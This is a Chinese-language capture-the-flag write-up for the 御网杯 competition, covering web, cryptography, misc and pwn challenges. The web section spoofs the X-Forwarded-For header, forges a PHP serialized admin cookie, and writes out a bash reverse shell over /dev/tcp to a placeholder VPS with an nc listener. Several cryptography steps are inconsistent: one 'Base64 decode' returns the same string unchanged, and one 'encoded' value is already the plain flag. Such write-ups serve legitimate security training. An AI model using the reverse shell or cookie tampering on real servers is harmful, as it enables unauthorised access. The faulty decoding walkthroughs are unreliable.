御网杯CTF竞赛Writeup技术解析<\/h1>

Web安全挑战<\/h2>

1. YWB_Web_xff (IP绕过)<\/h3>

题目分析<\/strong>：<\/p>

目标：绕过IP限制获取flag<\/li>
关键点：需要伪造IP为2.2.2.1才能获取flag<\/li> <\/ul>
解题步骤<\/strong>：<\/p>

查看网页源码发现PHP代码，确认IP验证逻辑<\/li>
使用Burp Suite或Hackbar工具<\/li>
在HTTP请求头中添加：
X-Forwarded-For: 2.2.2.1 <\/code><\/pre> <\/li> 提交登录请求获取flag<\/li> <\/ol> 技术要点<\/strong>：<\/p> X-Forwarded-For (XFF) HTTP头字段用于识别客户端原始IP<\/li> 常用于多级代理环境中传递真实客户端IP<\/li> 服务器端未严格验证XFF头导致IP伪造漏洞<\/li> <\/ul> 2. YWB_Web_未授权访问 (反序列化漏洞)<\/h3> 题目分析<\/strong>：<\/p> 目标：通过修改序列化数据提升为管理员权限<\/li> 关键点：Cookie中包含序列化的用户对象<\/li> <\/ul> 解题步骤<\/strong>：<\/p> 检查Cookie发现user字段包含URL编码的序列化数据<\/li> 解码得到原始序列化字符串： O:5:"Admin":2:{s:4:"name";s:5:"guest";s:7:"isAdmin";b:0;} <\/code><\/pre> <\/li> 修改isAdmin值为true： O:5:"Admin":2:{s:4:"name";s:5:"guest";s:7:"isAdmin";b:1;} <\/code><\/pre> <\/li> 重新URL编码后更新Cookie<\/li> 刷新页面获取flag<\/li> <\/ol> 技术要点<\/strong>：<\/p> PHP反序列化漏洞原理<\/li> 对象属性篡改攻击<\/li> URL编码\/解码技巧<\/li> 序列化字符串结构解析： O:5:"Admin"<\/code> - 5个字符的类名"Admin"<\/li> :2:<\/code> - 2个属性<\/li> s:4:"name"<\/code> - 4个字符的属性名"name"<\/li> s:5:"guest"<\/code> - 5个字符的字符串值"guest"<\/li> b:0<\/code> - 布尔值false<\/li> <\/ul> <\/li> <\/ul> 3. easyweb (命令执行)<\/h3> 题目分析<\/strong>：<\/p> 目标：利用exec函数执行系统命令<\/li> 关键点：exec无回显，需要外带数据<\/li> <\/ul> 解题步骤<\/strong>：<\/p> 确认POST参数cmd可用于命令执行<\/li> 使用反向Shell技术外带数据： bash -c 'exec 5<>\/dev\/tcp\/your_vps_ip\/8000;cat <&5 | while read line; do $line 2>&5 >&5; done' <\/code><\/pre> <\/li> 在VPS上监听8000端口： nc -lvnp 8000 <\/code><\/pre> <\/li> 执行命令获取flag<\/li> <\/ol> 技术要点<\/strong>：<\/p> Linux文件描述符重定向<\/li> 反向Shell技术<\/li> 无回显命令执行解决方案<\/li> 网络通信基础<\/li> <\/ul> 密码学挑战<\/h2> 1. easy-签到题 (多重编码)<\/h3> 解题步骤<\/strong>：<\/p> 初始密文： GY3DMQZWGE3DON2CGM4DMNBTGA3DEMZSGM4TGMZWGEZEIMZWGYZTGMJWGUZEIMZVGY3DGNZTGQZEIMZZGYZDGMZTGYZEIMZUGMYDGMJTHAZTOMZTGMZDGNRTGU3DKMZZGY3DORA= <\/code><\/pre> <\/li> Base64解码： GY3DMQZWGE3DON2CGM4DMNBTGA3DEMZSGM4TGMZWGEZEIMZWGYZTGMJWGUZEIMZVGY3DGNZTGQZEIMZZGYZDGMZTGYZEIMZUGMYDGMJTHAZTOMZTGMZDGNRTGU3DKMZZGY3DORA= <\/code><\/pre> <\/li> Base32解码： 666C61677B38643062323933612D366331652D356637342D396233362D3430313837333236356539667D <\/code><\/pre> <\/li> Base16(Hex)解码得到flag： flag{8d0b293a-6c1e-5f74-9b36-401873265e9f} <\/code><\/pre> <\/li> <\/ol> 技术要点<\/strong>：<\/p> Base编码识别技巧<\/li> 多重编码解密流程<\/li> 编码特征分析<\/li> <\/ul> 2. 草甸方阵的密语 (栅栏密码+凯撒)<\/h3> 解题步骤<\/strong>：<\/p> 初始密文： lDrwgDmg{efhsFr} <\/code><\/pre> <\/li> 栅栏密码解密（栏数需要尝试）： lrgm{fsrDwDgehF} <\/code><\/pre> <\/li> 凯撒移位解密（位移需要尝试）： flag{zmlXqXaybZ} <\/code><\/pre> <\/li> <\/ol> 技术要点<\/strong>：<\/p> 栅栏密码原理与破解<\/li> 凯撒密码暴力破解方法<\/li> 组合密码解题思路<\/li> <\/ul> 3. ez_base (Base64)<\/h3> 解题步骤<\/strong>：<\/p> 垃圾邮箱中获取Base64编码： flag{HNCTFhe9GFNECVH5TF} <\/code><\/pre> <\/li> 直接解码获取flag<\/li> <\/ol> 4. baby_rsa (RSA分解)<\/h3> 解题步骤<\/strong>：<\/p> 使用yafu工具分解n得到p和q<\/li> 计算φ(n) = (p-1)(q-1)<\/li> 计算私钥d = e⁻¹ mod φ(n)<\/li> 解密密文c：m = cᵈ mod n<\/li> 将结果中的4改为5得到flag： flag{5c9c885c361551e0b261f58b61db8cec} <\/code><\/pre> <\/li> <\/ol> 技术要点<\/strong>：<\/p> RSA算法原理<\/li> 大数分解工具使用<\/li> 模反元素计算<\/li> 解密过程实现<\/li> <\/ul> 杂项挑战<\/h2> 1. 被折叠的显影图纸 (文件分析)<\/h3> 解题步骤<\/strong>：<\/p> 使用010 Editor打开文件<\/li> 搜索"flag"字符串<\/li> 直接获取flag： flag{0ff!c3_3@$y_Kr@kK3d} <\/code><\/pre> <\/li> <\/ol> 技术要点<\/strong>：<\/p> 二进制文件分析技巧<\/li> 字符串搜索方法<\/li> 文件结构分析<\/li> <\/ul> 2. ez_xor (异或加密)<\/h3> 解题步骤<\/strong>：<\/p> 编写Python解密脚本： def<\/span> xor_decrypt<\/span>(cipher, key): <\/span><\/span> return<\/span> ''<\/span>.<\/span>join(chr(ord(c) ^<\/span> key) for<\/span> c in<\/span> cipher) <\/span><\/span> <\/span><\/span>cipher =<\/span> "..."<\/span> # 密文<\/span> <\/span><\/span>for<\/span> key in<\/span> range(256<\/span>): <\/span><\/span> print(xor_decrypt(cipher, key)) <\/span><\/span><\/code><\/pre><\/li> 尝试不同key值<\/li> 获取flag： flag{HCTFqweASD155} <\/code><\/pre> <\/li> <\/ol> 技术要点<\/strong>：<\/p> 异或加密原理<\/li> 暴力破解方法<\/li> Python脚本编写<\/li> <\/ul> 3. 光隙中的寄生密钥 (文件隐写)<\/h3> 解题步骤<\/strong>：<\/p> 使用binwalk分析文件： binwalk -e file <\/code><\/pre> <\/li> 提取出隐藏的压缩包<\/li> 使用ARCHPR爆破压缩包密码<\/li> 解压得到flag.txt<\/li> 十六进制转字符后Base64解码： flag{2Vd#Mk6%pR9zX!sA} <\/code><\/pre> <\/li> <\/ol> 技术要点<\/strong>：<\/p> 文件隐写分析<\/li> 压缩包密码爆破<\/li> 多重编码识别<\/li> <\/ul> Pwn挑战<\/h2> 1. Canary (栈溢出)<\/h3> 解题步骤<\/strong>：<\/p> 识别程序存在栈溢出漏洞<\/li> 发现程序有后门函数<\/li> 构造payload覆盖返回地址跳转到后门<\/li> 获取shell<\/li> <\/ol> 技术要点<\/strong>：<\/p> 栈溢出原理<\/li> Canary绕过技术<\/li> 返回地址覆盖<\/li> 后门函数利用<\/li> <\/ul> 2. ez_pwn (IO重定向)<\/h3> 解题步骤<\/strong>：<\/p> 识别简单栈溢出漏洞<\/li> 发现close(1)关闭了标准输出<\/li> 获取libc基地址<\/li> 构造ROP链调用system("\/bin\/sh")<\/li> 将输出重定向到标准错误<\/li> 获取shell<\/li> <\/ol> 技术要点<\/strong>：<\/p> 文件描述符操作<\/li> libc地址泄露<\/li> ROP链构造<\/li> IO重定向技巧<\/li> <\/ul> 总结<\/h2> 本Writeup详细解析了御网杯CTF竞赛中的各类题目，涵盖Web安全、密码学、杂项和Pwn等多个领域。关键技术点包括：<\/p> Web安全：<\/p> HTTP头注入<\/li> PHP反序列化漏洞<\/li> 命令执行与外带数据<\/li> <\/ul> <\/li> 密码学：<\/p> 多重编码分析<\/li> 古典密码破解<\/li> RSA算法实现<\/li> <\/ul> <\/li> 杂项：<\/p> 文件隐写分析<\/li> 异或加密破解<\/li> 二进制文件分析<\/li> <\/ul> <\/li> Pwn：<\/p> 栈溢出利用<\/li> Canary绕过<\/li> IO重定向技术<\/li> <\/ul> <\/li> <\/ol> 这些技术在实际CTF竞赛和渗透测试中都有广泛应用，掌握这些技能对安全研究人员至关重要。<\/p>